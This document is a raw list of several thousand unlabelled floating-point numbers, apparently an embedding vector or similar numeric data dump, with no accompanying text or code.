0.04857800900936127, -0.01781930960714817, -0.002315542660653591, -0.024579310789704323, 0.008508754894137383, 0.029141275212168694, -0.0030223014764487743, -0.0313807874917984, 0.007230022456496954, 0.018386099487543106, -0.01852434128522873, 0.011225197464227676, 0.004192168824374676, -0.03610863909125328, -0.007458120584487915, -0.008785237558186054, -0.028339475393295288, 0.0179437268525362, -0.008038734085857868, 0.010893418453633785, -0.00747194467112422, 0.0059340097941458225, -0.03226552903652191, -0.0017764013027772307, -0.01488859299570322, -0.01388634368777275, -0.01650601625442505, 5.265051186142955e-7, -0.00377398869022727, 0.046200256794691086, -0.007706955075263977, -0.0017306088702753186, -0.003919142298400402, -0.00881979800760746, -0.01882847212255001, 0.0036461155395954847, -0.037850480526685715, 0.021620946004986763, -0.0054605333134531975, 0.0058095925487577915, -0.028781848028302193, 0.017598124220967293, -0.0010514982277527452, -0.0005892537301406264, 0.013347201980650425, -0.014957713894546032, -0.003908773884177208, 0.010160738602280617, -0.027745038270950317, 0.02427517995238304, -0.009808223694562912, 0.007748427335172892, 0.011232109740376472, 0.007216198369860649, 0.0008113039075396955, 0.03262495622038841, -0.02339043654501438, -0.004890287760645151, -0.022975711151957512, -0.02568524330854416, -0.00805255863815546, -0.02757914923131466, 0.054190609604120255, 0.025533176958560944, -0.0004041399515699595, 0.0042474656365811825, -0.01810961589217186, 0.002277526305988431, 0.026542339473962784, 0.003684131894260645, -0.04420958459377289, 0.014390924014151096, 0.025768186897039413, 0.00043783627916127443, 0.01942290924489498, 0.006486975122243166, -0.007706955075263977, 0.03290143981575966, -0.000299810926662758, -0.030938412994146347, -0.0017617131816223264, -0.010692968033254147, -0.0015457110712304711, -0.000582341686822474, 0.005163314286619425, 0.00458615692332387, 0.0027942033484578133, -0.00858478806912899, 0.01693456433713436, -0.011017835699021816, 0.012614523060619831, -0.0025142645463347435, 0.008280656300485134, -0.02113710157573223, 0.016561312600970268, 0.0093796756118536, 0.024413421750068665, -0.024897266179323196, -0.023127777501940727, -0.0035735387355089188, 0.012960126623511314, -0.017003685235977173, -0.01740458607673645, 0.002768283011391759, 0.005201330874115229, -0.01193022821098566, 0.02391575276851654, -0.022865118458867073, -0.015621271915733814, 0.03362029418349266, -0.008944215252995491, -0.007651658728718758, 0.009580125100910664, 0.022740701213479042, -0.01006397046148777, 0.005816504824906588, -0.010879593901336193, 0.005384500604122877, -0.0044755637645721436, 0.01728016883134842, 0.037795186042785645, 0.006625216454267502, 0.0011871475726366043, -0.003919142298400402, -0.008073294535279274, -0.02905833162367344, -0.0317402146756649, -0.0003144990769214928, 0.0035942750982940197, -0.005011248867958784, 0.0179437268525362, -0.030440744012594223, -0.007838284596800804, 0.0007352711400017142, -0.003227935405448079, -0.01603599637746811, -0.0023570149205625057, 0.0007426152587868273, -0.017058981582522392, 0.008356689475476742, -0.0033454406075179577, 0.006113723386079073, -0.008985687978565693, -0.00038729177322238684, -0.01169521827250719, 0.033952075988054276, -0.0030413095373660326, 0.014791823923587799, -0.003243487561121583, 0.016851620748639107, 0.01580098643898964, -0.0005676535074599087, 0.021800659596920013, 0.005906361620873213, 0.0072991433553397655, 0.016837796196341515, -0.0396752655506134, 0.0021617491729557514, 0.015469206497073174, -0.009904992766678333, 0.0070433965884149075, -0.03798872232437134, -0.011881844140589237, -0.0017729452811181545, 0.004758958239108324, 0.038514040410518646, -0.0006760865799151361, -0.027261193841695786, -0.013983112759888172, -0.01506830658763647, -0.014169737696647644, 0.023832809180021286, 0.008149327710270882, -0.008750677108764648, -0.04432017728686333, 0.019257020205259323, 0.005204786546528339, -0.03367559239268303, 0.03710397705435753, -0.024524014443159103, -0.0028546839021146297, -0.032403770834207535, -0.027122952044010162, -0.014612110331654549, 0.01592540368437767, -0.0039225984364748, -0.0010385381756350398, 0.01592540368437767, 0.015593623742461205, 0.0019820353481918573, 0.0017651692032814026, -0.015704216435551643, 0.022160088643431664, -0.02279599756002426, 0.0299430750310421, -0.008785237558186054, -0.008923479355871677, 0.03124254383146763, 0.0054570771753787994, -0.024316653609275818, 0.027192072942852974, -0.004067751578986645, 0.009428059682250023, -0.028809497132897377, 0.004534316249191761, 0.026735875755548477, -0.004648365080356598, -0.036799848079681396, 0.0011845555854961276, -0.028809497132897377, 0.029390109702944756, -0.004181800875812769, -0.01491624116897583, -0.009303642436861992, 0.026556162163615227, -0.011183724738657475, -0.004828079137951136, 0.00039593185647390783, -0.005132209975272417, -0.009310554713010788, -0.025643769651651382, -0.005567670334130526, 0.02177301235496998, -0.019934402778744698, -0.0010221219854429364, 0.003846565494313836, 0.005166770424693823, 0.01598070003092289, -0.003984807059168816, 0.009130841121077538, -0.015206548385322094, 0.018496692180633545, 0.0014584462624043226, -0.021690066903829575, -0.03884581848978996, -0.007727691438049078, -0.00881979800760746, -0.013374850153923035, 0.02166241966187954, -0.0011733234860002995, -0.0005188370705582201, -0.005761208012700081, 0.037380460649728775, 0.01769489236176014, 0.01816491223871708, -0.005467445123940706, 0.016492193564772606, -0.005222066771239042, -0.015109779313206673, -0.013333378359675407, -0.02983248233795166, 0.009075544774532318, -0.030827820301055908, -0.004786606878042221, 0.015054482966661453, 0.025049332529306412, 0.011522416025400162, -0.012918653897941113, -0.012033909559249878, 0.029168924316763878, 0.018151089549064636, 0.0005585814360529184, 0.012172150425612926, -0.016243359073996544, 0.015386261977255344, -0.015413910150527954, -0.011225197464227676, -0.018842294812202454, 0.005363764241337776, -0.009663070552051067, -0.013768837787210941, -0.040449418127536774, -0.03162962198257446, 0.030164262279868126, 0.02449636720120907, -0.016063645482063293, 0.0012804605066776276, 0.023418083786964417, -0.015883930027484894, -0.026680579409003258, -0.033233221620321274, -0.0014757263706997037, 0.0009953377302736044, 0.01752900332212448, -0.0016744483727961779, -0.022699229419231415, -0.030883116647601128, -0.032707903534173965, -0.03436679765582085, 0.012317304499447346, -0.0004237961256876588, 0.025422584265470505, -0.013665157370269299, -0.0008834486361593008, -0.005526198074221611, -0.0020926285069435835, 0.008550227619707584, 0.02545023150742054, -0.006887875031679869, -0.005643703043460846, -0.005657527130097151, -0.008087119087576866, -0.026666756719350815, 0.03168491646647453, 0.026652932167053223, 0.0007961837691254914, -0.01322969701141119, -0.004741678014397621, -0.030026020482182503, -0.0008415441843681037, -0.009282906539738178, -0.0038880379870533943, -0.015455382876098156, -0.02775886282324791, 0.011142252944409847, -0.006469694897532463, -0.009158489294350147, -0.03190610185265541, -0.008494931273162365, 0.011335790157318115, 0.022713053971529007, -0.011474031955003738, 0.01982381008565426, 0.032763198018074036, -0.004758958239108324, 0.04260598495602608, 0.008743764832615852, 0.005871801171451807, 0.02339043654501438, -0.027689741924405098, 0.04512197524309158, 0.0017668972723186016, 0.012973950244486332, 0.017321640625596046, -0.04686381667852402, -0.01486094482243061, -0.032293178141117096, 0.03030250407755375, 0.00680838618427515, -0.030883116647601128, 0.024123115465044975, 0.04255068674683571, 0.012559226714074612, 0.0003138510510325432, -0.039039354771375656, 0.005204786546528339, -0.014542989432811737, 0.0008048238232731819, 0.03790577873587608, -0.052891138941049576, -0.014957713894546032, 0.00864008441567421, 0.03024720773100853, 0.003492322051897645, 0.005235890857875347, 0.0625956803560257, -0.03718692064285278, -0.026127614080905914, 0.0027924752794206142, -0.003929510246962309, -0.008723028935492039, 0.016063645482063293, -0.011176813393831253, 0.010630759410560131, -0.007990350015461445, 0.017238695174455643, 0.003936422523111105, -0.019962050020694733, -0.009953376837074757, 0.0007940237410366535, -0.0034128332044929266, -0.028781848028302193, 0.02261628396809101, -0.021759187802672386, 0.015026834793388844, 0.015773337334394455, 0.028450069949030876, 0.004800430964678526, -0.021220047026872635, -0.030219558626413345, 0.014294154942035675, 0.03892876207828522, -0.025878779590129852, -0.021800659596920013, -0.01053399033844471, -0.016948388889431953, 0.023749863728880882, 0.010713704861700535, 0.025007858872413635, -0.009663070552051067, -0.00105754635296762, -0.02698471024632454, 0.02343190833926201, -0.011536240577697754, 0.006507711485028267, -0.009061720222234726, 0.0023881192319095135, -0.008805973455309868, -0.01650601625442505, 0.0033454406075179577, -0.03685514256358147, -0.019091129302978516, 0.019630271941423416, 0.011142252944409847, 0.015911579132080078, 0.006099899299442768, -0.003932966385036707, 0.00698464410379529, 0.025837307795882225, 0.014183562248945236, 0.01929849199950695, 0.001130123040638864, 0.0219112541526556, -0.009275994263589382, -0.007347527425736189, 0.0018939065048471093, -0.004814255051314831, -0.02090209163725376, -0.003825829364359379, -0.003329888451844454, -0.035666268318891525, 0.015897754579782486, -0.004088487941771746, 0.012794236652553082, -0.007195462007075548, -0.008377425372600555, -0.021938901394605637, -0.032818496227264404, 0.01322969701141119, -0.03912230208516121, -0.007375176064670086, -0.014930065721273422, 0.019851457327604294, 0.07310202717781067, 0.0033782729879021645, -0.023777510970830917, -0.005370676517486572, -0.010305892676115036, 0.008536403067409992, -0.007679306901991367, -0.0004955088370479643, 0.014211210422217846, -0.02220156043767929, -0.009974113665521145, 0.002699162345379591, 0.000005855682047695154, -0.014114441350102425, -0.0032884159591048956, -0.0010160738602280617, -0.0026196734979748726, 0.01183345913887024, -0.011626097373664379, 0.018081968650221825, -0.020141763612627983, -0.0015560791362076998, -0.005408692639321089, -0.013630596920847893, -0.01669955439865589, 0.00932437926530838, -0.013167488388717175, -0.012448633089661598, -0.02142740972340107, -0.0019612992182374, 0.009275994263589382, 0.010997098870575428, 0.011197549290955067, -0.012358776293694973, 0.01574569009244442, 0.027841808274388313, 0.036606308072805405, -0.02072237804532051, -0.021565649658441544, -0.031463731080293655, 0.010976362973451614, 0.012579962611198425, 0.006027322728186846, -0.020750027149915695, 0.014183562248945236, 0.007941965013742447, 0.01465358305722475, -0.024109290912747383, 0.0058095925487577915, -0.015386261977255344, -0.0071747261099517345, -0.006659776903688908, 0.0024451438803225756, 0.003134622471407056, -0.036716900765895844, -0.009462620131671429, 0.01598070003092289, -0.0012441721046343446, -0.01877317577600479, -0.0036426594015210867, 0.002400215482339263, -0.01587010733783245, -0.001226027961820364, 0.0016277919057756662, -0.014695054851472378, 0.016644258052110672, -0.0168654453009367, -0.012400249019265175, 0.0060515147633850574, 0.03497505933046341, 0.002733722561970353, 0.008094031363725662, 0.0048453593626618385, -0.01024368405342102, 0.008218447677791119, 0.0026525058783590794, 0.007133253384381533, 0.017681067809462547, -0.024413421750068665, -0.04763796925544739, 0.010706792585551739, 0.017542827874422073, -0.018911415711045265, -0.012773500755429268, -0.007610186003148556, 0.0409470871090889, -0.020155588164925575, -0.01881464757025242, 0.018897593021392822, -0.0063245417550206184, -0.022160088643431664, 0.03232082724571228, 0.012075381353497505, 0.012683643959462643, -0.005723191890865564, 0.00377398869022727, 0.011667570099234581, 0.014252683147788048, -0.017833134159445763, 0.002343190833926201, -0.011798898689448833, -0.0004968048306182027, 0.013132927939295769, 0.00405392749235034, -0.025602297857403755, -0.007776075974106789, 0.011446383781731129, 0.009365851059556007, -0.003013661364093423, 0.009262170642614365, -0.021634770557284355, 0.0265146903693676, 0.0029704610351473093, -0.0038016370963305235, -0.01918789930641651, 0.012075381353497505, -0.02355632558465004, 0.011819635517895222, -0.00030197095475159585, -0.0031259823590517044, -0.021620946004986763, -0.018551988527178764, 0.006200124509632587, -0.03450503945350647, 0.009158489294350147, -0.00028577077318914235, -0.019104953855276108, 0.002325910609215498, 0.01304998341947794, 0.0018852663924917579, 0.004050471354275942, -0.003611555090174079, 0.011031659319996834, 0.0020044995471835136, 0.028367124497890472, 0.014446220360696316, 0.02788328006863594, 0.009220697917044163, -0.0019647551234811544, -0.015013010241091251, -0.03964762017130852, 0.013907079584896564, 0.023072481155395508, -0.01946438103914261, 0.008280656300485134, -0.014805648475885391, -0.015261844731867313, -0.012033909559249878, 0.0348091721534729, 0.012420984916388988, -0.005301555618643761, -0.004727853927761316, 0.0034664017148315907, 0.0299430750310421, 0.020335301756858826, -0.0066701448522508144, -0.01317440066486597, -0.040394119918346405, -0.005864889360964298, 0.002578201238065958, -0.003753252560272813, 0.020031170919537544, 0.02077767439186573, -0.009393499232828617, -0.012185974977910519, 0.01486094482243061, 0.006760002113878727, 0.00489719957113266, 0.0070433965884149075, -0.026846470311284065, -0.022284505888819695, 0.02616908773779869, -0.010817385278642178, 0.004883375484496355, 0.03162962198257446, 0.010921066626906395, -0.006894787307828665, 0.006404030602425337, 0.009621597826480865, -0.015565975569188595, -0.013727365992963314, 0.02047354355454445, -0.005851064808666706, -0.01476417575031519, 0.003957158420234919, -0.023044832050800323, 0.014819472096860409, -0.003386913100257516, -0.028450069949030876, 0.0261552631855011, -0.006932803429663181, 0.029970724135637283, 0.004264745395630598, -0.034477390348911285, -0.018897593021392822, 0.0033920970745384693, 0.03113195113837719, -0.007776075974106789, 0.018786998465657234, -0.006663233041763306, 0.0020079556852579117, 0.002507352503016591, 0.00864008441567421, -0.0038707577623426914, -0.011944052763283253, -0.014515341259539127, 0.02106798067688942, -0.005484725348651409, -0.013692805543541908, 0.01486094482243061, 0.002909980481490493, 0.03403501957654953, -0.011059307493269444, 0.020819146186113358, 0.030413096770644188, -0.019505854696035385, -0.0009875616524368525, -0.012123766355216503, -0.004669101443141699, -0.04683616757392883, -0.021855957806110382, 0.047389134764671326, 0.005270451307296753, 0.013036158867180347, 0.009227610193192959, 0.015565975569188595, 0.029168924316763878, 0.006746177561581135, 0.006749633699655533, 0.0022481498308479786, -0.01473652757704258, 0.016906917095184326, -0.007686218712478876, -0.02095738798379898, -0.013485443778336048, 0.0242613572627306, -0.012054645456373692, 0.0015508951619267464, 0.03414561226963997, -0.001639888039790094, -0.003988262731581926, -0.03964762017130852, -0.0026559617836028337, 0.014072969555854797, -0.0215518269687891, -0.00018478979473002255, 0.009006423875689507, -0.0003788676986005157, -0.0009426331962458789, -0.012448633089661598, -0.004786606878042221, 0.007568713743239641, -0.002151380991563201, 0.0009037528070621192, -0.029030682519078255, -0.01124593336135149, -0.04072590172290802, 0.01266981940716505, 0.011950964108109474, -0.015400086529552937, 0.009428059682250023, -0.012891005724668503, 0.035362135618925095, 0.024786673486232758, -0.055075351148843765, 0.014059145003557205, -0.018911415711045265, 0.004762414377182722, 0.00043999627814628184, -0.011363438330590725, 0.002412311499938369, 0.019727040082216263, -0.006196668371558189, 0.014031496830284595, -0.03901170939207077, 0.007077957037836313, 0.004185257013887167, -0.0175842996686697, -0.005170226562768221, 0.005256627220660448, -0.007554889656603336, 0.007693130988627672, 0.02793857641518116, -0.028726551681756973, 0.01609129272401333, 0.009642333723604679, -0.0060584270395338535, -0.013879431411623955, -0.020763849839568138, -0.019091129302978516, 0.003260767785832286, 0.011335790157318115, -0.036136288195848465, 0.014985362067818642, 0.011501680128276348, -0.0017936815274879336, -0.015911579132080078, -0.006991556379944086, 0.04506668075919151, -0.030108965933322906, -0.026970887556672096, 0.002871963893994689, 0.001745296991430223, 0.02550552785396576, -0.04846741631627083, 0.027551500126719475, 0.01900818571448326, -0.005360308103263378, -0.005640246905386448, 0.005878713447600603, -0.019865281879901886, -0.011128428392112255, 0.024192236363887787, 0.0030274854507297277, -0.013575300574302673, 0.030689578503370285, -0.0015707672573626041, 0.025782011449337006, -0.003919142298400402, 0.035721562802791595, 0.0026576898526400328, -0.0008618484134785831, 0.01032662857323885, 0.01101092342287302, -0.007734603248536587, -0.018040494993329048, 0.015054482966661453, -0.007119429297745228, -0.005246259272098541, -0.032237883657217026, 0.0136167723685503, 0.015579800121486187, 0.004015911370515823, 0.01391399186104536, -0.014155914075672626, 0.015386261977255344, 0.022215384989976883, 0.012061557732522488, -0.014017672277987003, 0.006279613357037306, -0.011363438330590725, 0.022049494087696075, -0.005968570243567228, 0.0015292948810383677, 0.0002641705796122551, 0.03591510280966759, 0.010340453125536442, 0.000890792696736753, -0.012579962611198425, -0.0358874537050724, -0.03782283142209053, 0.012068470008671284, -0.0337308906018734, -0.03765694424510002, -0.01734928973019123, 0.001569039304740727, -0.012407161295413971, 0.0078451968729496, 0.022878943011164665, -0.03646806627511978, -0.00961468555033207, -0.023127777501940727, -0.02645939402282238, -0.014349452219903469, 0.0043062181212008, 0.005197874736040831, 0.024123115465044975, -0.022699229419231415, 0.015013010241091251, -0.010257507674396038, -0.013001598417758942, -0.03356499969959259, -0.01053399033844471, -0.008017998188734055, 0.006507711485028267, 0.02763444557785988, 0.05493711307644844, -0.006708161439746618, -0.004396074917167425, 0.02977718599140644, -0.027496203780174255, -0.00473822234198451, -0.021565649658441544, -0.0011249389499425888, 0.024289004504680634, -0.00010562503302935511, -0.013278081081807613, 0.01616041362285614, -0.019450558349490166, -0.014003848657011986, 0.007458120584487915, 0.0011474031489342451, -0.022464219480752945, 0.02829800359904766, -0.002614489523693919, -0.003805093001574278, 0.014211210422217846, -0.02184213325381279, -0.028947738930583, -0.0012614523293450475, -0.006787650287151337, 0.0012744123814627528, 0.011315054260194302, 0.009096280671656132, 0.0007192870252765715, 0.012821884825825691, -0.013278081081807613, -0.021869780495762825, 0.0066770571283996105, -0.015939228236675262, 0.022298328578472137, 0.0027406346052885056, -0.013319553807377815, -0.009690718725323677, -0.029168924316763878, -0.001902546500787139, -0.004710573703050613, -0.019436733797192574, 0.02770356647670269, -0.012144502252340317, -0.016796324402093887, -0.0003654755710158497, -0.025823483243584633, 0.006760002113878727, 0.035306841135025024, 0.003666851669549942, 0.03284614533185959, -0.006887875031679869, 0.015953050926327705, 0.0022153176832944155, 0.01946438103914261, 0.021800659596920013, -0.016823971644043922, 0.012407161295413971, 0.010077794082462788, 0.01473652757704258, -0.002522904658690095, -0.017376936972141266, -0.0021807572338730097, 0.004050471354275942, 0.004527403973042965, -0.01257305033504963, -0.01870405487716198, -0.0019129146821796894, -0.019450558349490166, -0.02083297073841095, -0.024772848933935165, -0.009075544774532318, -0.00560914259403944, -0.00971145462244749, 0.00698464410379529, -0.001867986167781055, -0.002040787832811475, 0.010285155847668648, 0.009262170642614365, -0.0006691745365969837, 0.014999186620116234, 0.018068144097924232, -0.011702129617333412, -0.006023866590112448, 0.014349452219903469, -0.00932437926530838, 0.025823483243584633, 0.00858478806912899, -0.006566463969647884, -0.0018316978821530938, -0.01302233524620533, -0.0016597601352259517, 0.006352189928293228, 0.0006203580414876342, 0.009303642436861992, 0.019547326490283012, 0.010015585459768772, -0.01976851187646389, -0.013810310512781143, 0.0066286725923419, -0.0006004858296364546, -0.0101469149813056, -0.018316978588700294, 0.007803724147379398, 0.01704515889286995, 0.008743764832615852, -0.012925566174089909, -0.014169737696647644, 0.01175051461905241, 0.018151089549064636, 0.0028149394784122705, 0.00038837178726680577, -0.007796811871230602, 0.013893255032598972, 0.002277526305988431, -0.01728016883134842, -0.01465358305722475, 0.024897266179323196, 0.018247857689857483, 0.016146589070558548, 0.01639542356133461, 0.0006406622705981135, 0.00206498010084033, -0.031989049166440964, -0.012801148928701878, -0.009110105223953724, 0.000163297590916045, -0.009469532407820225, -0.00932437926530838, -0.007347527425736189, -0.009441884234547615, 0.006220860872417688, 0.015842458233237267, -0.004375338554382324, 0.022892767563462257, 0.011771250516176224, 0.015137427486479282, 0.025242870673537254, 0.019616447389125824, 0.00331433629617095, 0.009552476927638054, 0.0070261163637042046, 0.0037636207416653633, -0.025947900488972664, 0.012158326804637909, -0.004551596473902464, -0.002381207188591361, -0.0009037528070621192, -0.022823646664619446, -0.006393662188202143, 0.0037463405169546604, -0.018386099487543106, 0.005104561801999807, -0.004776238463819027, 0.0230863057076931, -0.0024209516122937202, 0.00138327747117728, -0.034311503171920776, 0.0001542255049571395, -0.00042595615377649665, -0.010796649381518364, 0.007782987784594297, 0.015261844731867313, -0.002737178700044751, -0.0003170910931658, -0.0029514527413994074, 0.00273890676908195, 0.0072991433553397655, -0.014446220360696316, -0.009981025010347366, 0.0027751950547099113, -0.021054157987236977, -0.002503896364942193, 0.013264257460832596, -0.007326791528612375, 0.023307491093873978, -0.028422420844435692, 0.0013443970819935203, -0.017846958711743355, 0.00744429649785161, 0.01798519864678383, 0.003995175007730722, -0.028450069949030876, -0.015579800121486187, 0.0030775980558246374, 0.016851620748639107, 0.0005408692522905767, -0.0031830070074647665, 0.0066805132664740086, 0.0052186110988259315, 0.0062035806477069855, -0.012552314437925816, -0.0027026182506233454, 0.008895830251276493, 0.020694728940725327, 0.02710912749171257, -0.012787324376404285, -0.016353951767086983, 0.0019198267254978418, 0.015234196558594704, -0.021620946004986763, -0.008225359953939915, -0.005913273431360722, -0.0017211047234013677, 0.005743927787989378, 0.008501842617988586, -0.011605361476540565, -0.0010860585607588291, -0.013520004227757454, 0.003597731003537774, 0.004758958239108324, -0.006974276155233383, -0.009746015071868896, -0.030800173059105873, 0.01346470694988966, 0.025851132348179817, -0.002890972187742591, -0.012020085006952286, -0.010057058185338974, -0.001005705795250833, 0.0008527762838639319, -0.006580288056284189, -0.0006233821040950716, 0.05167461559176445, -0.01580098643898964, 0.017860781401395798, 0.0008471602341160178, 0.015372437424957752, -0.025491705164313316, -0.0007443432696163654, -0.0015197908505797386, 0.015372437424957752, -0.019699392840266228, 0.003310880158096552, 0.023044832050800323, -0.00831521674990654, -0.009856607764959335, -0.025173749774694443, 0.016893092542886734, 0.0035562587436288595, 0.005270451307296753, 0.0043511465191841125, -0.014667406678199768, -0.03237612545490265, 0.018303154036402702, -0.000028755281164194457, -0.0016580321826040745, 0.006836034823209047, -0.010796649381518364, -0.00950409285724163, 0.010209123603999615, -0.008176975883543491, -0.001559535157866776, -0.0040988558903336525, 0.02427517995238304, 0.0172248724848032, 0.0008501842967234552, 0.004071207717061043, -0.009241433814167976, 0.027357961982488632, -0.019146427512168884, -0.01452916581183672, 0.010381924919784069, 0.020985037088394165, -0.002116820542141795, 0.007955789566040039, 0.01299468707293272, -0.0006860226858407259, -0.013596036471426487, 0.0024468719493597746, 0.020031170919537544, 0.014169737696647644, -0.0033938251435756683, 0.038624633103609085, 0.007762251887470484, 0.021026508882641792, -0.01275276392698288, 0.016782499849796295, 0.012510841712355614, -0.01940908469259739, 0.0355280265212059, 0.014183562248945236, -0.0066977934911847115, -0.00754797738045454, 0.008626259863376617, 0.020197059959173203, -0.0066286725923419, 0.007803724147379398, 0.007976525463163853, 0.026127614080905914, 0.0026905222330242395, 0.007921229116618633, -0.0011672753607854247, -0.000639798236079514, -0.010464870370924473, 0.004783150739967823, -0.024772848933935165, 0.0076447464525699615, -0.005643703043460846, -0.016671907156705856, 0.015165075659751892, 0.0013634052593261003, 0.00367030780762434, 0.0004408602835610509, -0.016298655420541763, 0.019602622836828232, -0.0013132927706465125, -0.01307763159275055, -0.001246764208190143, -0.019132602959871292, -0.00042595615377649665, -0.007713867351412773, 0.005007792729884386, -0.006846402771770954, -0.015787161886692047, 0.0028304916340857744, 0.003001565346494317, -0.002384663326665759, -0.01287026982754469, -0.006369470153003931, -0.01598070003092289, 0.012400249019265175, 0.022395098581910133, 0.0034871380776166916, 0.015939228236675262, -0.004914479795843363, 0.00448593171313405, -0.0015232468722388148, 0.0028512277640402317, 0.008861270733177662, 0.005025072954595089, -0.0014506701845675707, 0.021220047026872635, -0.01770871691405773, 0.014542989432811737, 0.007375176064670086, 0.030413096770644188, 0.009600861929357052, -0.004758958239108324, 0.010568550787866116, 0.005152946338057518, 0.009877344593405724, 0.008501842617988586, 0.01032662857323885, -0.0027060743886977434, 0.012179062701761723, 0.011757426895201206, -0.01816491223871708, -0.023722214624285698, -0.0031484467908740044, -0.006410942412912846, -0.007326791528612375, -0.006936259567737579, 0.003981350921094418, 0.0144738694652915, 0.03881816938519478, 0.011895667761564255, 0.012400249019265175, -0.000020695701095974073, 0.011453296057879925, -0.004672557581216097, -0.0166857298463583, 0.03107665479183197, -0.028394773602485657, 0.013333378359675407, -0.009255258366465569, -0.0008316080784425139, -0.01733546517789364, -0.02770356647670269, -0.008356689475476742, -0.004658733494579792, 0.03597039729356766, 0.015621271915733814, 0.005201330874115229, -0.0002607145288493484, -0.0018420659471303225, -0.0004743406316265464, 0.002588569186627865, 0.02905833162367344, 0.000010955356628983282, -0.001377229462377727, 0.0036080991849303246, -0.013927815482020378, 0.0021081806626170874, -0.010278244502842426, 0.012427897192537785, -0.018510516732931137, -0.021150926128029823, 0.023694567382335663, -0.0043511465191841125, 0.011508592404425144, -0.012420984916388988, -0.0029376286547631025, -0.007969614118337631, 0.007513417396694422, 0.010962538421154022, 0.012172150425612926, 0.007437384687364101, -0.000029592289138236083, -0.010824297554790974, -0.0021081806626170874, -0.005574582144618034, 0.01201317273080349, 0.0010661863489076495, 0.004980144556611776, -0.015483031049370766, -0.011052396148443222, 0.02000352367758751, 0.0012925566406920552, 0.012814972549676895, -0.023888105526566505, -0.0036357473582029343, -0.010810473002493382, -0.006635584868490696, 0.02213243953883648, 0.006639040540903807, 0.0006795426015742123, -0.006960452068597078, -0.004534316249191761, -0.016436895355582237, -0.007285318803042173, 0.012932478450238705, 0.03801637142896652, 0.006165564060211182, -0.004748590290546417, -0.0249802116304636, 0.0028667799197137356, -0.010029410012066364, 0.012897918000817299, 0.03149138018488884, -0.0020563399884849787, 0.012849532999098301, 0.017003685235977173, 0.0046898378059268, 0.016547489911317825, 0.009607773274183273, -0.00023241827148012817, 0.008543315343558788, -0.028201235458254814, 0.00293071661144495, -0.031463731080293655, 0.0009573213174007833, 0.02770356647670269, 0.015026834793388844, 0.006220860872417688, -0.022325977683067322, -0.004676013719290495, 0.015344789251685143, -0.007153989747166634, -0.01497153751552105, -0.004012455232441425, -0.02319689840078354, -0.0037117800675332546, -0.020044995471835136, -0.011729778721928596, -0.004282025620341301, -0.011128428392112255, -0.008446546271443367, -0.004786606878042221, -0.005301555618643761, -0.033177923411130905, -0.02811829000711441, 0.003756708698347211, 0.015234196558594704, -0.015994524583220482, -0.009904992766678333, -0.008100942708551884, -0.008778325282037258, -0.008909654803574085, -0.03212729096412659, -0.0163263026624918, -0.003488865913823247, -0.019035832956433296, -0.014197386801242828, 0.005674807354807854, 0.009441884234547615, 0.0013703173026442528, -0.009310554713010788, 0.01751517876982689, 0.01817873679101467, -0.05065162852406502, -0.0206532571464777, -0.0033437125384807587, -0.0010722344741225243, 0.003119070315733552, 0.010706792585551739, 0.005052721127867699, 0.0009987937519326806, -0.02220156043767929, 0.015524503774940968, -0.0337308906018734, -0.0022498778998851776, -0.015040658414363861, 0.0194782055914402, -0.030689578503370285, 0.0036979559808969498, 0.028920089825987816, -0.014791823923587799, 0.010513254441320896, 0.010160738602280617, -0.0015603991923853755, -0.0008786965627223253, -0.017501354217529297, 0.006566463969647884, 0.030385447666049004, 0.01645071990787983, 0.011232109740376472, -0.011688305996358395, 0.0005931417690590024, -0.0089718634262681, -0.020224709063768387, 0.021054157987236977, 0.020846795290708542, -0.004406442865729332, 0.018206385895609856, 0.010727528482675552, 0.013271169736981392, 0.007333703339099884, 0.017888430505990982, -0.00221877358853817, -0.0032002872321754694, 0.009428059682250023, -0.008335953578352928, 0.002711258362978697, -0.017501354217529297, 0.009434971958398819, 0.014155914075672626, 0.012773500755429268, 0.013623684644699097, 0.0006428222404792905, 0.01151550468057394, -0.003846565494313836, -0.0057093678042292595, 0.010817385278642178, -0.0060791634023189545, -0.001155179226770997, 0.006234684959053993, -0.018980536609888077, 0.013388674706220627, 0.012296567671000957, -0.002080532256513834, -0.001718512736260891, -0.012262007221579552, 0.013430146500468254, 0.022118614986538887, 0.00000872783493832685, 0.011073132045567036, -0.0038949500303715467, 0.0064247664995491505, -0.005799224600195885, -0.0009123929194174707, 0.004057383630424738, -0.03019190952181816, -0.0018645301461219788, -0.003929510246962309, 0.0044479151256382465, 0.01024368405342102, 0.020985037088394165, 0.000009645844329497777, -0.01486094482243061, -0.003193375188857317, -0.004067751578986645, -0.0265146903693676, -0.004012455232441425, 0.014432396739721298, -0.029998373240232468, -0.005118385888636112, -0.012268919497728348, 0.0005015569040551782, 0.004088487941771746, 0.008474194444715977, 0.016823971644043922, 0.016353951767086983, 0.004824622999876738, -0.010603111237287521, -0.013298817910254002, -0.025464056059718132, 0.0034715859219431877, -0.006010042503476143, 0.008391249924898148, 0.004496299661695957, 0.002999837277457118, 0.016201885417103767, -0.014460044912993908, -0.0018420659471303225, -0.022035671398043633, 0.015234196558594704, -0.018151089549064636, 0.016561312600970268, -0.0062830690294504166, -0.012497018091380596, -0.0008605523617006838, 0.013589124195277691, -0.002025235677137971, -0.012317304499447346, -0.017625771462917328, 0.011411823332309723, -0.0031968310941010714, 0.01340941060334444, 0.01859346032142639, 0.0010558182839304209, 0.0020338757894933224, 0.006269244942814112, 0.018358450382947922, -0.005747383926063776, 0.003808549139648676, -0.0396752655506134, -0.0024797040969133377, 0.006894787307828665, -0.014542989432811737, 0.00843272265046835, -0.009289818815886974, 0.004085031803697348, 0.0023069025482982397, -0.01616041362285614, -0.023957226425409317, 0.01231039222329855, -0.008695380762219429, 0.00031536308233626187, 0.0015949595253914595, -0.0065491837449371815, 0.013748101890087128, 0.006936259567737579, -0.0030896940734237432, -0.013948552310466766, -0.00029030683799646795, -0.013506179675459862, 0.0010264420416206121, -0.007098693400621414, -0.014280331321060658, 0.0011128428159281611, 0.014487693086266518, 0.003329888451844454, 0.0018092336831614375, -0.013672069646418095, 0.0021410128101706505, 0.00787284504622221, 0.017833134159445763, 0.006715073250234127, 0.010692968033254147, -0.00489719957113266, 0.003283231984823942, 0.005799224600195885, -0.009759838692843914, 0.016741028055548668, 0.0007521193474531174, -0.0017902255058288574, 0.002415767638012767, -0.012911741621792316, 0.002165205078199506, -0.02314160205423832, -0.013043071143329144, -0.022519515827298164, 0.0012562682386487722, 0.023583974689245224, -0.019671743735671043, 0.01109386794269085, 0.001779857324436307, 0.0010411301627755165, -0.01491624116897583, 0.004686381667852402, 0.004900655709207058, -0.012856445275247097, -0.003666851669549942, -0.006410942412912846, 0.005201330874115229, 